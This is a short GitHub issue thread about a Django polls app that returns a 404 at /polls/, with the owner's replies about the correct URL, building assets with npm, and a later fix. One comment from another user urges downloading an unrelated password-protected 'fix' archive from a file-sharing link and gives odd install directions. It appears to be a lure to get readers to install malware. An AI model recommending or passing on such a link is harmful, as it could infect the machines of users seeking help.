### ISSUE TITLE
/polls/ url returns 404 response

### ISSUE THREAD

**Issue by jbrucker** [Pawat-Sarnchawanakit/ku-polls#3]
I installed and ran your code in a virtualenv using Python 3.11
and Django 5.1.  After loading the polls data, I navigated
to http://localhost:8000/polls/ and got:

```
Page not found (404)
Request Method:	GET
Request URL:	http://localhost:8000/polls/
```

The debug listing shows that there is no /polls/ URL.

**Comment by Pawat-Sarnchawanakit** [comment]
You can go directly to `http://localhost:8000/` to see the list of polls.
Also have you build the assets using npm as specified in the README.md?
![image](https://github.com/user-attachments/assets/13d1e877-09e9-4b68-83d7-5ee4a501993d)

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Pawat-Sarnchawanakit** [comment]
Fixed in iteration2
